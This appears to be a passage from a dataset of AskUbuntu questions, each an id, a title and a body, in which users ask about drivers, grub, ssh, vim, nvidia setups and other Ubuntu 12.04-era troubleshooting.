192.168.1.0 any help would be highly appreciated .
201987	how do i force a 16x16 icon size for toolbar icons in gtk 3 ?	is there a way to force 16x16 icon size for toolbar icons in gtk3 ? in gtk2 it was possible by editing ~/.gtkrc-2.0 . i just do not know how to do this in gtk3 .
201988	printer add button not enabled	i am trying to set-up a network printer on my system . navigated to system setting > > printing and viola the add button out there is disabled . when i troubleshooted using help it said that the cups print spooler does not appear to be running . to correct this , choose system- > administration- > services from the main menu and look for 'cups ' service . please tell me what to do in order to add a printer
201994	missing driver for smart card reader ricoh co ltd rl5c476 ii ( rev b9 )	thanks for all who could help me to install a driver for smart card reader ricoh co ltd rl5c476 ii ( rev b9 ) . the driver is available here : ricoh rl5c476 and according to http : //sdricohcs.sourceforge.net/ the driver has been included in the official kernel sources . unfortunately the smart card reader ricoh co ltd rl5c476 ii still not recognized by ubuntu for me . windows xp works with it correctly . i did not manage with installing the driver because of missing : kernel-source and kernel-syms 02:06.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b9 ) subsystem : hewlett-packard company device 30be flags : bus master , medium devsel , latency 168 , irq 18 memory at e4100000 ( 32-bit , non-prefetchable ) [ size=4k ] bus : primary=02 , secondary=03 , subordinate=03 , sec-latency=176 memory window 0 : 84000000-87fff000 ( prefetchable ) memory window 1 : 90000000-93fff000 i/o window 0 : 00005c00-00005cff i/o window 1 : 00005800-000058ff 16-bit legacy interface ports at 0001 kernel driver in use : yenta_cardbus kernel modules : yenta_socket 02:06.1 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b9 ) subsystem : hewlett-packard company device 30be flags : bus master , medium devsel , latency 168 , irq 19 memory at e4101000 ( 32-bit , non-prefetchable ) [ size=4k ] bus : primary=02 , secondary=04 , subordinate=07 , sec-latency=176 memory window 0 : 80000000-83fff000 ( prefetchable ) memory window 1 : 8c000000-8ffff000 i/o window 0 : 00005400-000054ff i/o window 1 : 00005000-000050ff 16-bit legacy interface ports at 0001 kernel driver in use : yenta_cardbus kernel modules : yenta_socket thanks in advance for any help !
201995	bizarre ssh problem - it wo n't even start	i recently got ubuntu 12.04 precise , got it up and running with some mediawiki software , static ip on the box and router and was able to access the main page even from a cell phone . everything seemed great ... then i wanted to finally get rid of the monitor and keyboard and login remotely via ssh . i installed openssh-server , let everything point to port 22 for a test run and installed putty on my windows xp machine . i got a connection refused . went back and started checking the ubuntu install itself ... ( i 'm under root from this point on ) $ sudo -s $ service ssh status ssh stop/waiting $ service ssh start ssh start/running , process 2212 $ service ssh status ssh stop/waiting apparently ssh has stopped or is waiting for something ... . $ ssh localhost ssh : connect to host localhost port 22 : connection refused i ca n't even connect to myself ... i checked ufw ( firewall ) to see if port 22 is doing alright ... $ sudo ufw status status : active to action from 22 allow anywhere 22/tcp allow anywhere 22 allow anywhere ( v6 ) 22/tcp allow anywhere ( v6 ) sshd_config shows only port 22 is ssh not using the right ip address at all ? i just do n't get what i did wrong here . when this is up and running i will def change the port number , but for now , i do n't want to mess with the default install too much until a test run with putty is successful . edit : here are my sshd_config file and my ssh_config file . the command /usr/sbin/sshd -p 22 -d -d -e returns : /etc/ssh/sshd_config line 159 : subsystem 'sftp ' already defined . edit : @ phoibus moving the sshd_config file and reinstalling did the trick ! service ssh status the above command shows that ssh is now running and i am now able to log in from my windows xp computer remotely via putty . thanks so much ! i can now use my monitor for other things !
201999	ubuntu 12.04.1 lts and nvidia dirver ( 304.51 ) 64bit : problem 640x480	i have a problem with this configuration : asus k55v , ubuntu 12.04 lts and nvidia driver 304.51 . i have remove the nouveau driver with : apt-get -- purge remove xserver-xorg-video-nouveau i installed the official nvidia driver ( from www.nvidia.com ) but when i reboot the pc the resolution of screen is only 640x480 and the monitor is resized . mo solution at this problem if i change the xorg.conf . now i have uninstall the nvidia driver and reinstall with sudo apt-get purge nvidia-current sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current when i reboot the screen resolution and size is ok , but if i start nvidia-setting i received the message : you do not appear to be using the nvidia x driver . and with command : sudo lshw -c display | grep driver i received configuration : driver=i915 latency=0 this sound like the system is using the intel card . when i launch command lspci | grep vga the output is : 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation device 1058 ( rev ff ) and there is no /etc/x11/xorg.conf . i have read a lot of guides on internet but without success.. how i can use nvidia card with the driver that i have installed ?
202003	which java version should i target for 12.04 installations ?	i am considering developing a java application for ubuntu . the page https : //help.ubuntu.com/community/java does n't say which ( if any ) comes by default . also , i know many people change their java version to run applications like minecraft . what version are people running - or is java just a poor choice ?
202004	vim does not detect syntax of .ssh/config	on a plain ubuntu installation ( 12.04 in my case ) when i have no ~/.vimrc vim does not detect syntax of .ssh/config . syntax highlighting works , but it does not set the correct filetype . vi ~/.ssh/config : set syn ? > syntax=conf when i do : set syn=sshconfig then the syntax highlighting is as it should be . why is n't the filetype automatically identified ? and how can it be set automatically ?
202010	mirror using apt-mirror and exclude certain sections/categories	i 'm currently using apt-mirror to create a local mirror of the debian repositories . as the mirrored repositories will be used only by machines destined to be headless servers and as an effort to reduce the current mirroring size ( around 75gb ) , categories like games and possibly others will never be needed . how can i go about specifying ( on the mirror.list perhaps ? ) what sections/categories i want to be excluded from the mirroring ? maybe a bit subjective , but apart from games what other sections/categories could be `` safely '' ignored from the mirroring for my environment purposes ? my mirror.list looks as below since all the machines are using precise . # main deb-amd64 http : //archive.ubuntu.com/ubuntu precise main restricted universe multiverse deb-i386 http : //archive.ubuntu.com/ubuntu precise main restricted universe multiverse # security deb-amd64 http : //archive.ubuntu.com/ubuntu precise-security main restricted universe multiverse deb-i386 http : //archive.ubuntu.com/ubuntu precise-security main restricted universe multiverse also , what others would you recommend adding to the list to be mirrored for a relatively stable environment ? again i understand this is subjective , just looking for some pointers .
202011	xrdp setup over ssh	here are the steps to install xrdp on ubuntu 12.04 and get it working : http : //www.ubuntututorials.com/remote-desktop-ubuntu-12-04-windows-7/ however , i want a secure xrdp connection over ssh and i am able to achieve it by using port forwarding in the software putty as below : l1234 == > localhost:3389 but i am still able to remote login to the ubuntu through xrdp connection when i am not connected using ssh . it is supposed to deny remote login when ssh is not present . in the file /etc/xrdp/xrdp.ini i tried to change the [ global ] section by adding `` ip=127.0.0.1 '' and it did n't work .
202015	matlab shortcuts not working	i 'm using ubuntu 12.04 with unity and i ca n't seem to be able to use any shortcuts on matlab . it appears that they go directly to unity and bypass matlab all together . for instance , if i press f10 to do debug- > step , it opens up dropdown menu under the icon 'mail ' . how can i can i fix this ?
202017	nautilus could not create the following required folders	i have changed my username and when i did this , i can not log in with my new user and this error comes in the screen : nautilus could not create the following required folders : /home/ '' last username '' /desktop and /home/'last username'/.nautilus .also when i press ctrl+alt+f6 for the command line i can not login with my new username . although i have still access to linux by root . my ubuntu version is 11.04 .
202018	show desktop shortcut on pantheon	i 'm using elementary os 's pantheon desktop environment in ubuntu 12.04 . what is the shortcut to show the desktop ? how can i add show desktop icon on wingpanel or on plank doc ?
202025	add tags to an ogg opus file	i usually tag ogg vorbis files with eeasytag 2.1.7 . now , i want to produce ogg opus files , and i 'm not able to write tags into the file . easytag bears about ogg file not having a vorbis or a speex stream . another tools , such as lltag , spits messages like `` skipping this file with unknown type . '' some advice ? thanks .
202026	getting black screen after installing 12.04 on new mac pro	i installed ubuntu 12.04 on my new mac pro . i had some problems because bootcamp did not allow me to partition the hd without a windows cd . i inserted a windows cd and did the partition and then i stopped the installation . i completed the installation of ubuntu that now works . the problem is that grub ca n't start mac os . it sees the mac os x in the menu but if i try to start it i have a black screen or sometime just the boot manager . has anyone else experienced this problem ?
202028	does ubuntu support ati dual graphics ?	i currently own the amd a8-3850 apu ( gpu+cpu ) , and i 'm wondering if ubuntu supports amd 's dual graphics , or if i should focus on buying a more powerful card that is n't compatible .
202033	how to delete blacklisted items from /etc/modprobe.d/blacklist.conf ?	my wireless does n't work with ubuntu 12.04 . ( it worked with 10.04 lts ) i have a dell inspiron 1501 . i followed the steps posted below : run these : sudo apt-get install -- reinstall bcmwl-kernel-source broadcom-sta-common broadcom-sta-source echo `` blacklist brcmsmac '' | sudo tee -a /etc/modprobe.d/blacklist.conf echo `` blacklist bcma '' | sudo tee -a /etc/modprobe.d/blacklist.conf the first makes sure that the sta driver is in place , the second and third blacklists the two drivers brcmsmac and bcma which clash with the correct sta driver . copy/paste or make sure your typing is correct ! the last step is to go to 'additional drivers ' and enable the driver . ** ... .and now i have no network device on my pc ( wired or wireless )
202035	how to switch between windows	i 'm looking to quickly switch between to windows of an application in unity . i looked at unable to switch between different windows of the same application but i did n't get any answer . the only option i 've got is to long-click on the icon on the dash and click on the window when they 're all shown . that 's definitely too long ! i 'm sure there is a shortcut , like an alt+tab but i do n't find it . so , how can i quickly switch between windows of an application ?
202036	how to save terminal configurations ?	i open several terminal to use vim to edit several files . when i reboot , i should open again so many terminal and files . how to save the whole state of terminal ? thank you~
202039	is there any alternate dvd with complete language pack ?	i 'm looking for an alternate dvd ( like the alternate cd , but with complete language packs ) . is there one ?
202043	how do you bring back the bar where you can turn off the pc ?	the bar where you can turn off the pc , adjust the volume , see your email etc . has dissapeared . is there any way to bring it back ? thanks : )
202048	apply button not active in nvidia xserver configuration settings in ubuntu 12.04	i recently installed ubuntu 12.04 but when i want to connect an external monitor , tv or projector it does not recognise it anymore ( it used to with ubuntu 09.04 ) . i opened the xserver configutation settings and the primary laptop is disabled , it detect the external display but whatever i change , the apply button is not activated . please help me . i am not an ubuntu expert but i love it and would like to keep using it . nour
202049	can an empty output for the command aplay -l in the terminal reflect a audio hardware damage ?	the sound on my laptop is not working . i have ubuntu 10.04 installed . i went through a lot of help over the internet but nothing helped . every forum has aplay -l followed by **** list of playback hardware devices **** and something like this : - card 0 : intel [ hda intel ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 but when i try to do aplay -l on my laptop i only get **** list of playback hardware devices **** i am not able to find any help on why my laptop returns only this line and other lines are missing . is it that my hardware is damaged ?
202051	not able to setup tomboy web for ubuntu one	i have been trying to setup tomboy web in ubuntu 12.04 but without much success . i press the `` connect to server '' in the preferences dialog and the expected result is for your browser to open , with the authorization page . but , in my case , firefox opens but the authorization page does not open at all . some details : my default browser is chrome , but firefox always opens that to with a non-default profile . note : i have already browsed through most of the other articles in askubuntu regarding tomboy synchronization , but none of them discuss this particular problem
202057	how can i detect an audio hardware damage in ubuntu 10.04 ?	is there a way to detect an audio hardware damage . since my audio is not working , i need to understand whether it 's a hardware issue or some other problem . thanks
202058	ubuntu server virtualization on redhat linux	will ubuntu server 12.04 supports virtualization on redhat enterprise linux . i am facing a problem in ubuntu server 12.04 . ubuntu is not allowing me to get into admin rights . can you please help us .
202060	dell d1450u driver not present after upgrade	i updated my dinosaur `` dell dimension 8400 '' yesterday using a cd with ubuntu 12.04.1lts . when i did this i also deleted my windows partition on the computer ( i was never using it anyway ) . since this update i can not connect to the wifi network anymore . when i install the adsl cable into the computer it connects fine , but even after doing all possible updates the wifi is still not recognizing any network . i 'm thinking i might have deleted my driver when i deleted my windows partition , but i 'm not sure how to fix this ( i 'm not even sure this is the problem ) . the wireless usb adapter that my computer is using is : dell wireless 1450 wireless usb adapter , model = d1450u . i guess you guys need more info , but i do n't know what you need . tell me and i 'll post it asap .
202064	unable to locate package lightread	i have changed my source to local server . i 'm using ubuntu 12.10 . when i type apt-cache search in terminal , it shows nothing . when i install lightread it shows unable to locate package lightread . when i install lightread manually by python . it shows python '/home/peng/downloads/quickly_trunk/setup.py ' traceback ( most recent call last ) : file `` /home/peng/downloads/quickly_trunk/setup.py '' , line 93 , in < module > data_files= [ ( 'share/icons/hicolor/128x128/apps ' , [ 'data/media/lightread.png ' ] ) ] file `` /usr/lib/python2.7/dist-packages/distutilsextra/auto.py '' , line 71 , in setup src_mark ( src , 'setup.py ' ) file `` /usr/lib/python2.7/dist-packages/distutilsextra/auto.py '' , line 527 , in src_mark src.remove ( path ) keyerror : 'setup.py' how to solve the problem ?
202065	empty startup application	since i upgraded my system to 12.04 and did some updates , startup applications ( gnome-session-property ) is empty . is that correct ? ( i do n't think so ... ) . note : i tried to run it as sudo but it does n't work either . tks ...
202067	libvirt with spice on 12.04 amd64	i 'm using 12.04 lts amd64 as a kvm host + desktop . i have a windows 7 ultimate 64bit guest on this host . the installation worked perfect with the default ( vnc display ) settings . everything also works very well over a rdp session ( using rdesktop ) to the box , including sound and video . netflix , however , can detect somehow that i 'm on a remote desktop session so it fails at the `` buffering '' stage to launch the movie . i wanted to try out spice as a workaround for this , but when i switch the guest display over to spice it fails to launch with : error starting domain : unsupported configuration : spicevmc not supported in this qemu binary traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 45 , in cb_wrapper callback ( asyncjob , *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 66 , in tmpcb callback ( *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/domain.py '' , line 1120 , in startup self._backend.create ( ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 551 , in create if ret == -1 : raise libvirterror ( 'virdomaincreate ( ) failed ' , dom=self ) libvirterror : unsupported configuration : spicevmc not supported in this qemu binary how can i fix this ?
202072	what is a good amazon s3 client ?	i 've been using the amazon s3 management console to browse my s3 files . unfortunately , it does n't seem to be able to sort files ( in a given bucket ) by anything other than whatever its default is ( which seems to be by name ) . i 'd like a nice gui client for seeing these files which will let me sort them by date , so the newest will appear on top . update : i 'd also like it if the client could do a text search within a bucket ... but i suspect that this is wishful thinking .
202075	how do i get vim to remember the line i was on when i reopen a file ?	i just moved from rh/fedora to ubuntu 12.04 . in redhat , when i reopen a file with vim , it opens with the cursor on the line it was on when i closed the file . however , what i am seeing now is that when i reopen a file , the cursor is always at the top , every time . as some of the files i am working with are 20k lines long , this gets a bit old quickly . i installed the full version of vim via apt-get on my new ubuntu so that i could use the arrow keys in insert mode . the version that is printed out is vim - vi improved 7.3 . any help at all would be gratefully welcomed .
202085	finding a stream in a radio.com url	has anyone been able to play a radio.com radio station ? i can not locate a `` stream '' in this url : http : //player.radio.com/player/radioplayer.php ? version=1.2.13935 & station=2108
202088	is there a kind of ubuntu wiki sitemap or contents index ?	i feel the ubuntu wiki contains treasures , but i as much feel unable to exploit its contents as much as i would like . what i miss , is a kind of contents index , may be by categories , but a classical sitemap would be largely fine too . unfortunately , if i try to go to https : //wiki.ubuntu.com/sitemap.xml ( posting a raw url on purpose ) , i get that message : this page does not exist yet . you can create a new empty page , or use one of the page templates . and it only contains links to templates intended to the creation of new wikiâpages . i do n't know it something like what i 'm looking for exist ( did i missed it ? ) . a search on major searchâengines gave nothing , nor on askubuntu ( seems the question was never ask , or else it is a stupid question and i 'm wrong ) .
202089	problems mounting ntfs hard disk on boot	i 've followed this tutorial : can i change personal folder locations to mount my two disks on boot . the funny thing is that i was able to mount one ( datos ) , but the second ( programs ) gives me this error when i start the computer : an error ocurred while mounting /media/programs , press s to skip mounting or m for manual recovery i 've also followed the steps here : after upgrade to 11.10 . an error occurred while mounting / root filesystem but it did n't work out either . here is my output of blkid : /dev/sda1 : label= '' datos '' uuid= '' 06ec5b95ec5b7e3d '' type= '' ntfs '' /dev/sdb1 : label= '' programs '' uuid= '' 4c1c26ff1c26e3a4 '' type= '' ntfs '' /dev/sdb5 : uuid= '' 8b6ad8ec-046b-490a-af60-aed89651c33a '' type= '' swap '' /dev/sdb6 : uuid= '' 021ca0e0-bfec-42e4-bc80-f72ff41c4c6f '' type= '' ext4 '' /dev/sdc1 : uuid= '' c8f81c73f81c61cc '' type= '' ntfs '' here are the permissions on the /media folder : drwxrwxrwx 1 root root 4096 oct 11 03:01 datos lrwxrwxrwx 1 root root 7 oct 13 14:50 floppy - > floppy0 drwxr-xr-x 2 root root 4096 oct 13 14:50 floppy0 drwxrwxrwx 2 root root 4096 oct 17 14:30 programs here is my fstab : ' # ' / was on /dev/sdb6 during installation uuid=021ca0e0-bfec-42e4-bc80-f72ff41c4c6f / ext4 errors=remount-ro 0 1 ' # ' swap was on /dev/sdb5 during installation uuid=8b6ad8ec-046b-490a-af60-aed89651c33a none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 uuid=06ec5b95ec5b7e3d /media/datos ntfs defaults 0 0 uuid=4c1c26ff1c26e3a4 /media/programs nfts defaults 0 0 any idea why following the same procedure datos loads on boot and programs gives me an error ? thank you
202090	how to open exchange 2010 shared calendar ?	i 'm quite new to the whole linux world , and i 'm trying to migrate the whole of my pc to linux and show that it can keep up with all of my company requirements ( we are specialized on cisco networking , voip and datacenter solutions ) . unfortunately i seem to have reached a dead-end . aside from an actual bug on evolution mail in the signature bit - adding an image to sig is fine , hyperlinking over it crashes the client ( ! ) ... this could be ok if it was n't for the fact that also opening shared exchange calendars seems to be impossible . i tried several links on google , i already managed to connect correctly to exchange 2010 , but there is no shared calendars option that i can see . i tried opening a calendar in my work mail , but it seems the only option you can get is to open your personal one . one more thing which is really bugging me , changing the view to a personalized one ( by date-descending ) is n't retained on evolution mail restart ( every folder will get back to the original setting , which is incomprehensible to me ) . do you guys have any amazing terminal commands that i could run to fix these issues ? up until now any even small thing i wanted to tweak already had an answer somewhere , still this seems to be absolutely impossible to resolve . i am running on ubuntu 12.04.1 lts with kernel 3.2.0-32-generic-pae on a acer travelmate 8372 ( i know , poor machine , but what can i do ... ) .
202094	reinstalling grub2 on ubuntu 12.04 | windows 7 dual boot after windows reinstallation	so i had the perfect ubuntu 12 / windows 7 dual boot set-up -- until i had to re-install windows 7 . after the deed , grub2 was of course wiped out , thus my ubuntu installation is rendered inaccessible . i have tried these steps : mount /dev/sda5 /mnt # this is where my ubuntu installation resides . mount /dev/sda1 /mnt/boot # indicated by the `*` under `boot` when doing `fdisk -l` mount -- bind /mnt/proc /proc mount -- bind /mnt/sys /sys mount -- bind /mnt/dev /dev sudo chroot mnt sudo grub-install /dev/sda sudo update-grub # then unmounted everything ... unfortunately , only my windows 7 has been detected and the ubuntu entries never appeared in the prompt . only my windows 7 installation ( /dev/sda1 ) is available in the grub2 menu . how can i rectify this ?
202097	dependency problems installing google chrome package due to xdg-utils error	trying to install google chrome on my fresh ubuntu 12.04 install . i have run a full apt-get upgrade and apt-get update on this system before installing chrome . i downloaded the 32-bit deb package from www.chrome.com and opened it in ubuntu software center . it gets almost to the end and then throws up the following error . any insight ? unpacking google-chrome-stable : i386 ( from ... /google-chrome-stable_current_i386.deb ) ... dpkg : dependency problems prevent configuration of google-chrome-stable : i386 : google-chrome-stable : i386 depends on xdg-utils ( > = 1.0.2 ) . dpkg : error processing google-chrome-stable : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ...
202102	need help to install persistent ubuntu on usb drive	i am a new user of ubuntu . i would like to install a persistent ubuntu 11.04 to my usb stick , and it should be able to work as a guest os running on windows so that i can boot it on other computers other than the one which i used for the installation . i have used several creators such as unetbootin , however from my understanding it can only create live linux which i am unable to save my configurations and files . if it 's possible i would like to bypass the bios , that is to say that i can just load from the virtual machine without having to restart the computer . thanks in advance ! thanks for all the replies ! hi mike , i am able to create a virtual machine and run it from my usb drive using a portable virtualbox . how do i go about from there , do i have to proceed with the installation ? could you elaborate more on the steps for the installation ? thanks again !
202106	vlc wo n't play back sound after after apply normal system updates	everything was fine this morning until i routinely updated my 12.04.01 set up . however i just realized that my favorite player , vlc ca n't playback any sound whatsoever ( be it mp3 , flv , mpeg etc ) . every other media player ( sm player , rhthymbox , default movie player ) works fine . how can i fix this ?
202108	will it create any critical problems if one always uses ''shutdown -h now '' ?	according to this post menu shutdown asks each application to save their work prior to shutting down . will something more serious happen if one always uses sudo shutdown -h now to turn off the machine ? it works so fast , i am getting hang of it .
202114	changing os from windows to ubuntu	so my computer has 2 operating systems on it , windows 7 and ubuntu 12.04 . when i downloaded ubuntu i had a ton of trouble booting windows 7 up again , then i downloaded grub and switched my default os back to windows . sadly though , i 'm trying to get into writing php with apache . i downloaded wamp ( windows apache mysql php ) but for some reason , php does n't work . i though i would try downloading lamp ( linux apace mysql php ) but whenever i boot up my pc , i do n't get a chance to enter the ubuntu os . how could i get back to running ubuntu ? actually , it does n't prompt me for a boot menu or anything . it just goes straight to the windows symbol
202117	xmonad with unity / hud	i want to use xmonad and still use the hud from unity . is this possible ? could xmonad be using while using unity ? is there a way to use the hud inside of xmonad ? i 'm in 12.04 , soon to be 12.10 .
202123	gnome extensions stay in the list after being removed	i 've got a little issue with gnome shell extensions . after installing some of them , i understood i did n't like them and decided to remove them . the extensions themselves ( their folders in /home/username/.local/share/gnome-shell/extensions ) were deleted successfully . however , the deleted extensions were not removed from the list of installed extensions at extensions.gnome.org . they also were not removed from the list in gnome-tweak-tool . so now in my list i have a bunch of extensions that i have already deleted . the funny thing is that i ca n't reinstall them too , since both the gnome-tweak-tool and the website think they are still there . this is n't a big deal of course , but i find it a little annoying . reinstalling gnome-tweak-tool did n't help . is there a way to somehow update the status of installed extensions ?
202124	how do i load the synaptics driver on 12.04 ? ( scrolling does not work )	i have installed ubuntu 12.04 on my new lenovo z580 laptop . the touchpad maker is synaptics . however ubuntu is unable to load the synaptics driver , although the driver has been installed . due to this , i am unable to use scrolling on my touchpad . the command synclient -l returns : could n't find synaptics properties . no synaptics driver loaded ? please help .
202127	what is an alternative linux application for visual basic ?	what is an alternative linux application for visual basic ?
202129	how i can change the gdm login screen wallpaper ?	how i can change the gdm 3.6 wallpaper ? i dont mean the desktop background , but the wallpaper at the login ( gdm 3.6 ) . thanks thank you for your answer , i know exactly what you mean . recently i had installed lightdm , but today i uninstalled it , and replaced it with gdm . ubuntu-tweak dont show the login screen appearance button . i think it 's because lightdm is currently not installed . does anyone know where is the folder where the images are stored ?
202131	unable to download a file using drag & drop	i 've been downloading images from the internet doing drag & drop while holding the ctrl key . using google chrome , and of course nautilus , it used to work fine . but i recently had problems with packages and now every time i do that a warning menu appears showing this message : the specified location is not supported probably i removed the packaged which allowed me to download content ... can anybody help me ? note : downloading doing right-click works , but i use more drag & drop .
202132	ubuntu perfomance issues	i have as deafult win 7 64b . but i get annoyed by some windows stuff so i decided to install ubuntu and learn linux , because win 8 is a nightmare . i have my ubuntu 12.04 64bit installed in 100gb partition of my 1 tb disc . my problem is that my ubuntu feel really slower than win 7 - even though my win 7 are after some years of usage and they became much slower . and ubuntu is just installed os - i just downloaded wine and skype . it takes some time for new window to appear ( its not 10 seconds , but its really slower than my windows ) . sometimes my donwload get stuck ( in basic ubuntu app store ) its just weird to me . i thought its because of some drivers , but i am really new to linux , so i decided to ask some1 before i screw whole system up . specs : -6gbs of ram - 3x2gb -3.0 ghz cpu quadcore -graphic card is hd4870 sapphire please excuse my poor english and my addiction to windows interface . pelda
202134	four monitor setup with two nvidia graphics cards	i 'm running ubuntu 12.04 and i have two nvidia quadro 2000 video cards , each with two monitors plugged in ( all 4 monitors are identical ) . now i have the latest nvidia drivers , and i 'm trying to use the nvidia control panel to use all four monitors , and i ca n't get it to work . currently , my configuration is using twinview to have 2 monitors per x screen . this does n't work well because either i turn xinerama on , and nothing appears on the screen when i start a x session with compiz enabled . things only work in ubuntu 2d . i turn xinerama off , and compiz works , but now , i cant drag windows between the two screens and i have no idea how to start applications in the other screen . is there a better way to configure my four monitor setup ? is there a way to get both gpus onto a single x screen ?
202136	how can a script detect a user 's idle time ?	i want to check , inside a bash script ( * ) , how long the user of a x session has been idle . the user himself does not have to be using bash , but just x . if the user just moved the mouse , for example , a good answer would be `` idle for 0 seconds '' . if he has not touched the computer in 5 minutes , a good answer would be `` idle for 300 seconds '' the reason to not use xautolock straight away is to be able to implement some complex behavior . for example , if the user is idle for 10 minutes , try to suspend , if he is idle for more 5 minutes , shutoff ( i know it sounds odd , but suspend does not always work here ... ) ( * ) or could be another language .
202146	failed to install grub2 on a raid0 ssd	i installed ubuntu successfully except the last step . i can not install grub2 on my disk . my disk is a rai0-ssd . all disks are ssd , totally 512g . that 's the detail http : //paste.ubuntu.com/1285121/
202148	should i update to 12.10 tomorrow ?	after i upgraded from 10.04 to 12.04 and got unity my computer got pretty much slowed down because i do n't really have a good computer . i only have 3 gb ( which i upgraded myself ) ram and 2 , 13ghz single core . would 12.10 be faster if i upgrade tomorrow ?
202151	ubuntu 12.04.1 lts wo n't let me enter password	i have a old mesh pc with a 160gb sata harddrive , 2.5gb of ram and a 1.5ghz proccesor ( amd sempron ) i logged into ubuntu today and it would n't let me type in the password , let me click , or just about anything ! i have installed zsnes ( snes emulator ) , pcsx ( playstation emulator ) dosemu ( dos emulator ) , chromium ( web browser ) and virtualbox ( runs a guest pc on a normal pc )
202152	problem adding music to ipod in rhythmbox	i believe the problem is this because the ipod plugin lacks the transfer option , is there any way to fix this ? i am running 12.04 lts and have ifuse ( 1.1.1-2 ) libimobiledevice-utils ( 1.1.1-4 ) using an ipod touch running 4.2.1 if it matters . anyone have any suggestions ?
202154	how to boot into windows after installing grub ?	i did this very clever decision to set windows 7 bootloader to ubuntu . now i can not boot back to windows . if i try to boot via grub it shows the windows bootloader for half a second and goes back to grub . also the safemode of windows ceased to work , so i can not go back and change the settings . i am totally screwed here and would not want to install the os ( both of them ) again ...
202155	ca n't load webpages from applications	i am using ubuntu 12.04 64 bit , firefox 16.0.01 . whenever i try to open a webpage in a browser from within any application , the browser opens but nothing gets loaded . for eg : from dropbox if i click launch dropbox website , firefox opens but all i get is the firefox home page . how can i solve this problem ?
202158	default gnome browser opens start page	irritatingly , when i click a link in an application ( i use quassel ) , firefox opens the default start page . i have a somewhat non-standard configuration setup . i am using a nightly build of firefox , where the binary is located at /opt/nightly/firefox . i have a symbolic link from /usr/bin/firefox - > /opt/nightly/firefox . i have ubuntu 11.04 , using gnome with docky . my docky panel has a firefox icon on the panel that correctly uses the firefox that i want , but when i click on a link in an application such as quassel , it only opens with the default start page , rather than the link i want to navigate to . also , it opens in a new window , rather than creating a new tab in my existing session . i 've tried playing with the gconf-editor , and the gconftool-2 -r /desktop/gnome/url-handlers command gives me : /desktop/gnome/url-handlers/unknown : command = firefox `` % s '' needs_terminal = false /desktop/gnome/url-handlers/net : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/msnim : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/chrome : command = firefox `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/rtsp : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/cdda : command = sound-juicer % s needs_terminal = false enabled = true /desktop/gnome/url-handlers/ftp : command = firefox `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/ut : command = /usr/share/ubuntu-tweak/uturl `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/uvox : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/h323 : command = ekiga -c % s needs_terminal = false enabled = true /desktop/gnome/url-handlers/about : command = firefox `` % s '' needs_terminal = false /desktop/gnome/url-handlers/mailto : command = thunderbird % s needs_terminal = false enabled = true /desktop/gnome/url-handlers/sip : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/xmpp : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/vnc : command = vinagre % s needs_terminal = false enabled = true /desktop/gnome/url-handlers/http : command = firefox `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/mmsh : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/rtp : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/mms : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/irc : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/pnm : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/callto : command = gnomemeeting -c % s needs_terminal = false enabled = true /desktop/gnome/url-handlers/https : command = firefox `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/gg : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/trash : command = nautilus `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/ghelp : command = gnome-help `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/icq : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/ymsgr : command = purple-url-handler `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/icy : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/magnet : command = transmission ' % s' needs_terminal = false enabled = true /desktop/gnome/url-handlers/note : command = tomboy -- open-note ' % s' enabled = true /desktop/gnome/url-handlers/info : command = gnome-help `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/apt : command = apturl `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/man : command = gnome-help `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/icyx : command = totem `` % s '' needs_terminal = false enabled = true /desktop/gnome/url-handlers/webcal : command = /usr/lib/evolution-webcal/evolution-webcal % s need-terminal = false enabled = true /desktop/gnome/url-handlers/aim : command = purple-url-handler `` % s '' needs_terminal = false enabled = true
